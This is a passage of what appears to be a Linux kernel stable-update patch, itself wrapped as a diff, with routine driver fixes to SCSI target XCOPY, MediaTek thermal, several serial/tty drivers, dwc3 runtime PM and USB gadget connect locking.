+ 	kfree(xop);
+-	pr_warn_ratelimited("target_xcopy_do_work: rc: %d, sense: %u, XCOPY operation failed\n",
+-			   rc, sense_rc);
++	pr_warn_ratelimited("%s: rc: %d, sense: %u, XCOPY operation failed\n",
++			   __func__, rc, sense_rc);
+ 	target_complete_cmd_with_sense(ec_cmd, SAM_STAT_CHECK_CONDITION, sense_rc);
+ }
+ 
+diff --git a/drivers/target/target_core_xcopy.h b/drivers/target/target_core_xcopy.h
+index e5f20005179a8..0aad7dc658955 100644
+--- a/drivers/target/target_core_xcopy.h
++++ b/drivers/target/target_core_xcopy.h
+@@ -5,7 +5,7 @@
+ #define XCOPY_TARGET_DESC_LEN		32
+ #define XCOPY_SEGMENT_DESC_LEN		28
+ #define XCOPY_NAA_IEEE_REGEX_LEN	16
+-#define XCOPY_MAX_SECTORS		4096
++#define XCOPY_MAX_BYTES			16777216 /* 16 MB */
+ 
+ /*
+  * SPC4r37 6.4.6.1
+diff --git a/drivers/thermal/mtk_thermal.c b/drivers/thermal/mtk_thermal.c
+index 8440692e3890d..62f1e691659e3 100644
+--- a/drivers/thermal/mtk_thermal.c
++++ b/drivers/thermal/mtk_thermal.c
+@@ -1028,7 +1028,12 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	auxadc_base = of_iomap(auxadc, 0);
++	auxadc_base = devm_of_iomap(&pdev->dev, auxadc, 0, NULL);
++	if (IS_ERR(auxadc_base)) {
++		of_node_put(auxadc);
++		return PTR_ERR(auxadc_base);
++	}
++
+ 	auxadc_phys_base = of_get_phys_base(auxadc);
+ 
+ 	of_node_put(auxadc);
+@@ -1044,7 +1049,12 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	apmixed_base = of_iomap(apmixedsys, 0);
++	apmixed_base = devm_of_iomap(&pdev->dev, apmixedsys, 0, NULL);
++	if (IS_ERR(apmixed_base)) {
++		of_node_put(apmixedsys);
++		return PTR_ERR(apmixed_base);
++	}
++
+ 	apmixed_phys_base = of_get_phys_base(apmixedsys);
+ 
+ 	of_node_put(apmixedsys);
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index f034723b1b40e..f79cae48a8eab 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -1058,7 +1058,7 @@ void tb_port_lane_bonding_disable(struct tb_port *port);
+ int tb_port_wait_for_link_width(struct tb_port *port, int width,
+ 				int timeout_msec);
+ int tb_port_update_credits(struct tb_port *port);
+-bool tb_port_is_clx_enabled(struct tb_port *port, enum tb_clx clx);
++bool tb_port_is_clx_enabled(struct tb_port *port, unsigned int clx);
+ 
+ int tb_switch_find_vse_cap(struct tb_switch *sw, enum tb_switch_vse_cap vsec);
+ int tb_switch_find_cap(struct tb_switch *sw, enum tb_switch_cap cap);
+diff --git a/drivers/tty/serial/8250/8250.h b/drivers/tty/serial/8250/8250.h
+index 287153d325365..1e8fe44a7099f 100644
+--- a/drivers/tty/serial/8250/8250.h
++++ b/drivers/tty/serial/8250/8250.h
+@@ -365,6 +365,13 @@ static inline void serial8250_do_prepare_rx_dma(struct uart_8250_port *p)
+ 	if (dma->prepare_rx_dma)
+ 		dma->prepare_rx_dma(p);
+ }
++
++static inline bool serial8250_tx_dma_running(struct uart_8250_port *p)
++{
++	struct uart_8250_dma *dma = p->dma;
++
++	return dma && dma->tx_running;
++}
+ #else
+ static inline int serial8250_tx_dma(struct uart_8250_port *p)
+ {
+@@ -380,6 +387,11 @@ static inline int serial8250_request_dma(struct uart_8250_port *p)
+ 	return -1;
+ }
+ static inline void serial8250_release_dma(struct uart_8250_port *p) { }
++
++static inline bool serial8250_tx_dma_running(struct uart_8250_port *p)
++{
++	return false;
++}
+ #endif
+ 
+ static inline int ns16550a_goto_highspeed(struct uart_8250_port *up)
+diff --git a/drivers/tty/serial/8250/8250_bcm7271.c b/drivers/tty/serial/8250/8250_bcm7271.c
+index 89bfcefbea848..36e31b96ef4a5 100644
+--- a/drivers/tty/serial/8250/8250_bcm7271.c
++++ b/drivers/tty/serial/8250/8250_bcm7271.c
+@@ -1016,14 +1016,16 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 	/* See if a Baud clock has been specified */
+ 	baud_mux_clk = of_clk_get_by_name(np, "sw_baud");
+ 	if (IS_ERR(baud_mux_clk)) {
+-		if (PTR_ERR(baud_mux_clk) == -EPROBE_DEFER)
+-			return -EPROBE_DEFER;
++		if (PTR_ERR(baud_mux_clk) == -EPROBE_DEFER) {
++			ret = -EPROBE_DEFER;
++			goto release_dma;
++		}
+ 		dev_dbg(dev, "BAUD MUX clock not specified\n");
+ 	} else {
+ 		dev_dbg(dev, "BAUD MUX clock found\n");
+ 		ret = clk_prepare_enable(baud_mux_clk);
+ 		if (ret)
+-			return ret;
++			goto release_dma;
+ 		priv->baud_mux_clk = baud_mux_clk;
+ 		init_real_clk_rates(dev, priv);
+ 		clk_rate = priv->default_mux_rate;
+@@ -1031,7 +1033,8 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 
+ 	if (clk_rate == 0) {
+ 		dev_err(dev, "clock-frequency or clk not defined\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto release_dma;
+ 	}
+ 
+ 	dev_dbg(dev, "DMA is %senabled\n", priv->dma_enabled ? "" : "not ");
+@@ -1118,7 +1121,9 @@ err1:
+ 	serial8250_unregister_port(priv->line);
+ err:
+ 	brcmuart_free_bufs(dev, priv);
+-	brcmuart_arbitration(priv, 0);
++release_dma:
++	if (priv->dma_enabled)
++		brcmuart_arbitration(priv, 0);
+ 	return ret;
+ }
+ 
+@@ -1130,7 +1135,8 @@ static int brcmuart_remove(struct platform_device *pdev)
+ 	hrtimer_cancel(&priv->hrt);
+ 	serial8250_unregister_port(priv->line);
+ 	brcmuart_free_bufs(&pdev->dev, priv);
+-	brcmuart_arbitration(priv, 0);
++	if (priv->dma_enabled)
++		brcmuart_arbitration(priv, 0);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index 2a3bd6918c77e..b8e8a96c3eb63 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -15,6 +15,7 @@
+ #include <linux/moduleparam.h>
+ #include <linux/ioport.h>
+ #include <linux/init.h>
++#include <linux/irq.h>
+ #include <linux/console.h>
+ #include <linux/gpio/consumer.h>
+ #include <linux/sysrq.h>
+@@ -1926,6 +1927,7 @@ static bool handle_rx_dma(struct uart_8250_port *up, unsigned int iir)
+ int serial8250_handle_irq(struct uart_port *port, unsigned int iir)
+ {
+ 	struct uart_8250_port *up = up_to_u8250p(port);
++	struct tty_port *tport = &port->state->port;
+ 	bool skip_rx = false;
+ 	unsigned long flags;
+ 	u16 status;
+@@ -1951,6 +1953,8 @@ int serial8250_handle_irq(struct uart_port *port, unsigned int iir)
+ 		skip_rx = true;
+ 
+ 	if (status & (UART_LSR_DR | UART_LSR_BI) && !skip_rx) {
++		if (irqd_is_wakeup_set(irq_get_irq_data(port->irq)))
++			pm_wakeup_event(tport->tty->dev, 0);
+ 		if (!up->dma || handle_rx_dma(up, iir))
+ 			status = serial8250_rx_chars(up, status);
+ 	}
+@@ -2010,18 +2014,19 @@ static int serial8250_tx_threshold_handle_irq(struct uart_port *port)
+ static unsigned int serial8250_tx_empty(struct uart_port *port)
+ {
+ 	struct uart_8250_port *up = up_to_u8250p(port);
++	unsigned int result = 0;
+ 	unsigned long flags;
+-	u16 lsr;
+ 
+ 	serial8250_rpm_get(up);
+ 
+ 	spin_lock_irqsave(&port->lock, flags);
+-	lsr = serial_lsr_in(up);
++	if (!serial8250_tx_dma_running(up) && uart_lsr_tx_empty(serial_lsr_in(up)))
++		result = TIOCSER_TEMT;
+ 	spin_unlock_irqrestore(&port->lock, flags);
+ 
+ 	serial8250_rpm_put(up);
+ 
+-	return uart_lsr_tx_empty(lsr) ? TIOCSER_TEMT : 0;
++	return result;
+ }
+ 
+ unsigned int serial8250_do_get_mctrl(struct uart_port *port)
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 48eb5fea62fd0..81467e93c7d53 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1276,7 +1276,7 @@ static inline int lpuart_start_rx_dma(struct lpuart_port *sport)
+ 	 * 10ms at any baud rate.
+ 	 */
+ 	sport->rx_dma_rng_buf_len = (DMA_RX_TIMEOUT * baud /  bits / 1000) * 2;
+-	sport->rx_dma_rng_buf_len = (1 << (fls(sport->rx_dma_rng_buf_len) - 1));
++	sport->rx_dma_rng_buf_len = (1 << fls(sport->rx_dma_rng_buf_len));
+ 	if (sport->rx_dma_rng_buf_len < 16)
+ 		sport->rx_dma_rng_buf_len = 16;
+ 
+diff --git a/drivers/tty/serial/max310x.c b/drivers/tty/serial/max310x.c
+index fbf6e2b3161c5..338cb19dec23c 100644
+--- a/drivers/tty/serial/max310x.c
++++ b/drivers/tty/serial/max310x.c
+@@ -525,6 +525,11 @@ static bool max310x_reg_precious(struct device *dev, unsigned int reg)
+ 	return false;
+ }
+ 
++static bool max310x_reg_noinc(struct device *dev, unsigned int reg)
++{
++	return reg == MAX310X_RHR_REG;
++}
++
+ static int max310x_set_baud(struct uart_port *port, int baud)
+ {
+ 	unsigned int mode = 0, div = 0, frac = 0, c = 0, F = 0;
+@@ -651,14 +656,14 @@ static void max310x_batch_write(struct uart_port *port, u8 *txbuf, unsigned int
+ {
+ 	struct max310x_one *one = to_max310x_port(port);
+ 
+-	regmap_raw_write(one->regmap, MAX310X_THR_REG, txbuf, len);
++	regmap_noinc_write(one->regmap, MAX310X_THR_REG, txbuf, len);
+ }
+ 
+ static void max310x_batch_read(struct uart_port *port, u8 *rxbuf, unsigned int len)
+ {
+ 	struct max310x_one *one = to_max310x_port(port);
+ 
+-	regmap_raw_read(one->regmap, MAX310X_RHR_REG, rxbuf, len);
++	regmap_noinc_read(one->regmap, MAX310X_RHR_REG, rxbuf, len);
+ }
+ 
+ static void max310x_handle_rx(struct uart_port *port, unsigned int rxlen)
+@@ -1472,6 +1477,10 @@ static struct regmap_config regcfg = {
+ 	.writeable_reg = max310x_reg_writeable,
+ 	.volatile_reg = max310x_reg_volatile,
+ 	.precious_reg = max310x_reg_precious,
++	.writeable_noinc_reg = max310x_reg_noinc,
++	.readable_noinc_reg = max310x_reg_noinc,
++	.max_raw_read = MAX310X_FIFO_SIZE,
++	.max_raw_write = MAX310X_FIFO_SIZE,
+ };
+ 
+ #ifdef CONFIG_SPI_MASTER
+@@ -1557,6 +1566,10 @@ static struct regmap_config regcfg_i2c = {
+ 	.volatile_reg = max310x_reg_volatile,
+ 	.precious_reg = max310x_reg_precious,
+ 	.max_register = MAX310X_I2C_REVID_EXTREG,
++	.writeable_noinc_reg = max310x_reg_noinc,
++	.readable_noinc_reg = max310x_reg_noinc,
++	.max_raw_read = MAX310X_FIFO_SIZE,
++	.max_raw_write = MAX310X_FIFO_SIZE,
+ };
+ 
+ static const struct max310x_if_cfg max310x_i2c_if_cfg = {
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index 179ee199df343..23a7ab0de4445 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -1552,7 +1552,7 @@ uart_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 		goto out;
+ 
+ 	/* rs485_config requires more locking than others */
+-	if (cmd == TIOCGRS485)
++	if (cmd == TIOCSRS485)
+ 		down_write(&tty->termios_rwsem);
+ 
+ 	mutex_lock(&port->mutex);
+@@ -1595,7 +1595,7 @@ uart_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 	}
+ out_up:
+ 	mutex_unlock(&port->mutex);
+-	if (cmd == TIOCGRS485)
++	if (cmd == TIOCSRS485)
+ 		up_write(&tty->termios_rwsem);
+ out:
+ 	return ret;
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index 0e6ef24419c8e..28edbaf7bb329 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -690,8 +690,9 @@ static void stm32_usart_transmit_chars(struct uart_port *port)
+ 	int ret;
+ 
+ 	if (!stm32_port->hw_flow_control &&
+-	    port->rs485.flags & SER_RS485_ENABLED) {
+-		stm32_port->txdone = false;
++	    port->rs485.flags & SER_RS485_ENABLED &&
++	    (port->x_char ||
++	     !(uart_circ_empty(xmit) || uart_tx_stopped(port)))) {
+ 		stm32_usart_tc_interrupt_disable(port);
+ 		stm32_usart_rs485_rts_enable(port);
+ 	}
+diff --git a/drivers/tty/tty.h b/drivers/tty/tty.h
+index 1c08c9b67b16c..c5ee219127555 100644
+--- a/drivers/tty/tty.h
++++ b/drivers/tty/tty.h
+@@ -62,6 +62,8 @@ int __tty_check_change(struct tty_struct *tty, int sig);
+ int tty_check_change(struct tty_struct *tty);
+ void __stop_tty(struct tty_struct *tty);
+ void __start_tty(struct tty_struct *tty);
++void tty_write_unlock(struct tty_struct *tty);
++int tty_write_lock(struct tty_struct *tty, int ndelay);
+ void tty_vhangup_session(struct tty_struct *tty);
+ void tty_open_proc_set_tty(struct file *filp, struct tty_struct *tty);
+ int tty_signal_session_leader(struct tty_struct *tty, int exit_session);
+diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
+index 1ac6784ea1f92..8fb6c6853556a 100644
+--- a/drivers/tty/tty_io.c
++++ b/drivers/tty/tty_io.c
+@@ -933,13 +933,13 @@ static ssize_t tty_read(struct kiocb *iocb, struct iov_iter *to)
+ 	return i;
+ }
+ 
+-static void tty_write_unlock(struct tty_struct *tty)
++void tty_write_unlock(struct tty_struct *tty)
+ {
+ 	mutex_unlock(&tty->atomic_write_lock);
+ 	wake_up_interruptible_poll(&tty->write_wait, EPOLLOUT);
+ }
+ 
+-static int tty_write_lock(struct tty_struct *tty, int ndelay)
++int tty_write_lock(struct tty_struct *tty, int ndelay)
+ {
+ 	if (!mutex_trylock(&tty->atomic_write_lock)) {
+ 		if (ndelay)
+diff --git a/drivers/tty/tty_ioctl.c b/drivers/tty/tty_ioctl.c
+index ce511557b98b1..ad1cf51ecd11d 100644
+--- a/drivers/tty/tty_ioctl.c
++++ b/drivers/tty/tty_ioctl.c
+@@ -500,21 +500,42 @@ static int set_termios(struct tty_struct *tty, void __user *arg, int opt)
+ 	tmp_termios.c_ispeed = tty_termios_input_baud_rate(&tmp_termios);
+ 	tmp_termios.c_ospeed = tty_termios_baud_rate(&tmp_termios);
+ 
+-	ld = tty_ldisc_ref(tty);
++	if (opt & (TERMIOS_FLUSH|TERMIOS_WAIT)) {
++retry_write_wait:
++		retval = wait_event_interruptible(tty->write_wait, !tty_chars_in_buffer(tty));
++		if (retval < 0)
++			return retval;
+ 
+-	if (ld != NULL) {
+-		if ((opt & TERMIOS_FLUSH) && ld->ops->flush_buffer)
+-			ld->ops->flush_buffer(tty);
+-		tty_ldisc_deref(ld);
+-	}
++		if (tty_write_lock(tty, 0) < 0)
++			goto retry_write_wait;
+ 
+-	if (opt & TERMIOS_WAIT) {
+-		tty_wait_until_sent(tty, 0);
+-		if (signal_pending(current))
+-			return -ERESTARTSYS;
+-	}
++		/* Racing writer? */
++		if (tty_chars_in_buffer(tty)) {
++			tty_write_unlock(tty);
++			goto retry_write_wait;
++		}
+ 
+-	tty_set_termios(tty, &tmp_termios);
++		ld = tty_ldisc_ref(tty);
++		if (ld != NULL) {
++			if ((opt & TERMIOS_FLUSH) && ld->ops->flush_buffer)
++				ld->ops->flush_buffer(tty);
++			tty_ldisc_deref(ld);
++		}
++
++		if ((opt & TERMIOS_WAIT) && tty->ops->wait_until_sent) {
++			tty->ops->wait_until_sent(tty, 0);
++			if (signal_pending(current)) {
++				tty_write_unlock(tty);
++				return -ERESTARTSYS;
++			}
++		}
++
++		tty_set_termios(tty, &tmp_termios);
++
++		tty_write_unlock(tty);
++	} else {
++		tty_set_termios(tty, &tmp_termios);
++	}
+ 
+ 	/* FIXME: Arguably if tmp_termios == tty->termios AND the
+ 	   actual requested termios was not tmp_termios then we may
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index 5abdc2b0f506d..71f172ecfaabc 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -1101,7 +1101,7 @@ static int ci_hdrc_probe(struct platform_device *pdev)
+ 	ret = ci_usb_phy_init(ci);
+ 	if (ret) {
+ 		dev_err(dev, "unable to init phy: %d\n", ret);
+-		return ret;
++		goto ulpi_exit;
+ 	}
+ 
+ 	ci->hw_bank.phys = res->start;
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 476b636185116..9f8c988c25cb1 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -1883,13 +1883,11 @@ static int dwc3_probe(struct platform_device *pdev)
+ 	spin_lock_init(&dwc->lock);
+ 	mutex_init(&dwc->mutex);
+ 
++	pm_runtime_get_noresume(dev);
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_use_autosuspend(dev);
+ 	pm_runtime_set_autosuspend_delay(dev, DWC3_DEFAULT_AUTOSUSPEND_DELAY);
+ 	pm_runtime_enable(dev);
+-	ret = pm_runtime_get_sync(dev);
+-	if (ret < 0)
+-		goto err1;
+ 
+ 	pm_runtime_forbid(dev);
+ 
+@@ -1954,12 +1952,10 @@ err3:
+ 	dwc3_free_event_buffers(dwc);
+ 
+ err2:
+-	pm_runtime_allow(&pdev->dev);
+-
+-err1:
+-	pm_runtime_put_sync(&pdev->dev);
+-	pm_runtime_disable(&pdev->dev);
+-
++	pm_runtime_allow(dev);
++	pm_runtime_disable(dev);
++	pm_runtime_set_suspended(dev);
++	pm_runtime_put_noidle(dev);
+ disable_clks:
+ 	dwc3_clk_disable(dwc);
+ assert_reset:
+@@ -1983,6 +1979,7 @@ static int dwc3_remove(struct platform_device *pdev)
+ 	dwc3_core_exit(dwc);
+ 	dwc3_ulpi_exit(dwc);
+ 
++	pm_runtime_allow(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_set_suspended(&pdev->dev);
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 5997d7f943fec..d2622378ce040 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2522,29 +2522,17 @@ static int __dwc3_gadget_start(struct dwc3 *dwc);
+ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ {
+ 	unsigned long flags;
++	int ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc->connected = false;
+ 
+ 	/*
+-	 * Per databook, when we want to stop the gadget, if a control transfer
+-	 * is still in process, complete it and get the core into setup phase.
++	 * Attempt to end pending SETUP status phase, and not wait for the
++	 * function to do so.
+ 	 */
+-	if (dwc->ep0state != EP0_SETUP_PHASE) {
+-		int ret;
+-
+-		if (dwc->delayed_status)
+-			dwc3_ep0_send_delayed_status(dwc);
+-
+-		reinit_completion(&dwc->ep0_in_setup);
+-
+-		spin_unlock_irqrestore(&dwc->lock, flags);
+-		ret = wait_for_completion_timeout(&dwc->ep0_in_setup,
+-				msecs_to_jiffies(DWC3_PULL_UP_TIMEOUT));
+-		spin_lock_irqsave(&dwc->lock, flags);
+-		if (ret == 0)
+-			dev_warn(dwc->dev, "timed out waiting for SETUP phase\n");
+-	}
++	if (dwc->delayed_status)
++		dwc3_ep0_send_delayed_status(dwc);
+ 
+ 	/*
+ 	 * In the Synopsys DesignWare Cores USB3 Databook Rev. 3.30a
+@@ -2557,6 +2545,33 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	__dwc3_gadget_stop(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	/*
++	 * Per databook, when we want to stop the gadget, if a control transfer
++	 * is still in process, complete it and get the core into setup phase.
++	 * In case the host is unresponsive to a SETUP transaction, forcefully
++	 * stall the transfer, and move back to the SETUP phase, so that any
++	 * pending endxfers can be executed.
++	 */
++	if (dwc->ep0state != EP0_SETUP_PHASE) {
++		reinit_completion(&dwc->ep0_in_setup);
++
++		ret = wait_for_completion_timeout(&dwc->ep0_in_setup,
++				msecs_to_jiffies(DWC3_PULL_UP_TIMEOUT));
++		if (ret == 0) {
++			unsigned int    dir;
++
++			dev_warn(dwc->dev, "wait for SETUP phase timed out\n");
++			spin_lock_irqsave(&dwc->lock, flags);
++			dir = !!dwc->ep0_expect_in;
++			if (dwc->ep0state == EP0_DATA_PHASE)
++				dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
++			else
++				dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
++			dwc3_ep0_stall_and_restart(dwc);
++			spin_unlock_irqrestore(&dwc->lock, flags);
++		}
++	}
++
+ 	/*
+ 	 * Note: if the GEVNTCOUNT indicates events in the event buffer, the
+ 	 * driver needs to acknowledge them before the controller can halt.
+@@ -4237,15 +4252,8 @@ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		break;
+ 	case DWC3_DEVICE_EVENT_SUSPEND:
+ 		/* It changed to be suspend event for version 2.30a and above */
+-		if (!DWC3_VER_IS_PRIOR(DWC3, 230A)) {
+-			/*
+-			 * Ignore suspend event until the gadget enters into
+-			 * USB_STATE_CONFIGURED state.
+-			 */
+-			if (dwc->gadget->state >= USB_STATE_CONFIGURED)
+-				dwc3_gadget_suspend_interrupt(dwc,
+-						event->event_info);
+-		}
++		if (!DWC3_VER_IS_PRIOR(DWC3, 230A))
++			dwc3_gadget_suspend_interrupt(dwc, event->event_info);
+ 		break;
+ 	case DWC3_DEVICE_EVENT_SOF:
+ 	case DWC3_DEVICE_EVENT_ERRATIC_ERROR:
+diff --git a/drivers/usb/gadget/function/f_tcm.c b/drivers/usb/gadget/function/f_tcm.c
+index 658e2e21fdd0d..c21acebe8aae5 100644
+--- a/drivers/usb/gadget/function/f_tcm.c
++++ b/drivers/usb/gadget/function/f_tcm.c
+@@ -1054,7 +1054,7 @@ static void usbg_cmd_work(struct work_struct *work)
+ 				  tv_nexus->tvn_se_sess->se_tpg->se_tpg_tfo,
+ 				  tv_nexus->tvn_se_sess, cmd->data_len, DMA_NONE,
+ 				  cmd->prio_attr, cmd->sense_iu.sense,
+-				  cmd->unpacked_lun);
++				  cmd->unpacked_lun, NULL);
+ 		goto out;
+ 	}
+ 
+@@ -1183,7 +1183,7 @@ static void bot_cmd_work(struct work_struct *work)
+ 				  tv_nexus->tvn_se_sess->se_tpg->se_tpg_tfo,
+ 				  tv_nexus->tvn_se_sess, cmd->data_len, DMA_NONE,
+ 				  cmd->prio_attr, cmd->sense_iu.sense,
+-				  cmd->unpacked_lun);
++				  cmd->unpacked_lun, NULL);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index bf9878e1a72a8..e85706812d61e 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -37,6 +37,10 @@ static struct bus_type gadget_bus_type;
+  * @vbus: for udcs who care about vbus status, this value is real vbus status;
+  * for udcs who do not care about vbus status, this value is always true
+  * @started: the UDC's started state. True if the UDC had started.
++ * @connect_lock: protects udc->vbus, udc->started, gadget->connect, gadget->deactivate related
++ * functions. usb_gadget_connect_locked, usb_gadget_disconnect_locked,
++ * usb_udc_connect_control_locked, usb_gadget_udc_start_locked, usb_gadget_udc_stop_locked are
++ * called with this lock held.
+  *
+  * This represents the internal data structure which is used by the UDC-class
+  * to hold information about udc driver and gadget together.
+@@ -48,6 +52,7 @@ struct usb_udc {
+ 	struct list_head		list;
+ 	bool				vbus;
+ 	bool				started;
++	struct mutex			connect_lock;
+ };
+ 
+ static struct class *udc_class;
+@@ -660,17 +665,9 @@ out:
+ }
+ EXPORT_SYMBOL_GPL(usb_gadget_vbus_disconnect);
+ 
+-/**
+- * usb_gadget_connect - software-controlled connect to USB host
+- * @gadget:the peripheral being connected
+- *
+- * Enables the D+ (or potentially D-) pullup.  The host will start
+- * enumerating this gadget when the pullup is active and a VBUS session
+- * is active (the link is powered).
+- *
+- * Returns zero on success, else negative errno.
+- */
+-int usb_gadget_connect(struct usb_gadget *gadget)
++/* Internal version of usb_gadget_connect needs to be called with connect_lock held. */
++static int usb_gadget_connect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -679,10 +676,15 @@ int usb_gadget_connect(struct usb_gadget *gadget)
+ 		goto out;
+ 	}
+ 
+-	if (gadget->deactivated) {
++	if (gadget->connected)
++		goto out;
++
++	if (gadget->deactivated || !gadget->udc->started) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will be connected automatically after activation.
++		 *
++		 * udc first needs to be started before gadget can be pulled up.
+ 		 */
+ 		gadget->connected = true;
+ 		goto out;
+@@ -697,22 +699,32 @@ out:
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL_GPL(usb_gadget_connect);
+ 
+ /**
+- * usb_gadget_disconnect - software-controlled disconnect from USB host
+- * @gadget:the peripheral being disconnected
+- *
+- * Disables the D+ (or potentially D-) pullup, which the host may see
+- * as a disconnect (when a VBUS session is active).  Not all systems
+- * support software pullup controls.
++ * usb_gadget_connect - software-controlled connect to USB host
++ * @gadget:the peripheral being connected
+  *
+- * Following a successful disconnect, invoke the ->disconnect() callback
+- * for the current gadget driver so that UDC drivers don't need to.
++ * Enables the D+ (or potentially D-) pullup.  The host will start
++ * enumerating this gadget when the pullup is active and a VBUS session
++ * is active (the link is powered).
+  *
+  * Returns zero on success, else negative errno.
+  */
+-int usb_gadget_disconnect(struct usb_gadget *gadget)
++int usb_gadget_connect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_connect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(usb_gadget_connect);
++
++/* Internal version of usb_gadget_disconnect needs to be called with connect_lock held. */
++static int usb_gadget_disconnect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -724,10 +736,12 @@ int usb_gadget_disconnect(struct usb_gadget *gadget)
+ 	if (!gadget->connected)
+ 		goto out;
+ 
+-	if (gadget->deactivated) {
++	if (gadget->deactivated || !gadget->udc->started) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will stay disconnected after activation.
++		 *
++		 * udc should have been started before gadget being pulled down.
+ 		 */
+ 		gadget->connected = false;
+ 		goto out;
+@@ -747,6 +761,30 @@ out:
+ 
+ 	return ret;
+ }
++
++/**
++ * usb_gadget_disconnect - software-controlled disconnect from USB host
++ * @gadget:the peripheral being disconnected
++ *
++ * Disables the D+ (or potentially D-) pullup, which the host may see
++ * as a disconnect (when a VBUS session is active).  Not all systems
++ * support software pullup controls.
++ *
++ * Following a successful disconnect, invoke the ->disconnect() callback
++ * for the current gadget driver so that UDC drivers don't need to.
++ *
++ * Returns zero on success, else negative errno.
++ */
++int usb_gadget_disconnect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_disconnect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(usb_gadget_disconnect);
+ 
+ /**
+@@ -767,10 +805,11 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	if (gadget->deactivated)
+ 		goto out;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	if (gadget->connected) {
+-		ret = usb_gadget_disconnect(gadget);
++		ret = usb_gadget_disconnect_locked(gadget);
+ 		if (ret)
+-			goto out;
++			goto unlock;
+ 
+ 		/*
+ 		 * If gadget was being connected before deactivation, we want
+@@ -780,6 +819,8 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	}
+ 	gadget->deactivated = true;
+ 
++unlock:
++	mutex_unlock(&gadget->udc->connect_lock);
+ out:
+ 	trace_usb_gadget_deactivate(gadget, ret);
+ 
+@@ -803,6 +844,7 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	if (!gadget->deactivated)
+ 		goto out;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	gadget->deactivated = false;
+ 
+ 	/*
+@@ -810,7 +852,8 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	 * while it was being deactivated, we call usb_gadget_connect().
+ 	 */
+ 	if (gadget->connected)
+-		ret = usb_gadget_connect(gadget);
++		ret = usb_gadget_connect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
+ 
+ out:
+ 	trace_usb_gadget_activate(gadget, ret);
+@@ -1051,12 +1094,13 @@ EXPORT_SYMBOL_GPL(usb_gadget_set_state);
+ 
+ /* ------------------------------------------------------------------------- */
+ 
+-static void usb_udc_connect_control(struct usb_udc *udc)
++/* Acquire connect_lock before calling this function. */
++static void usb_udc_connect_control_locked(struct usb_udc *udc) __must_hold(&udc->connect_lock)
+ {
+-	if (udc->vbus)
+-		usb_gadget_connect(udc->gadget);
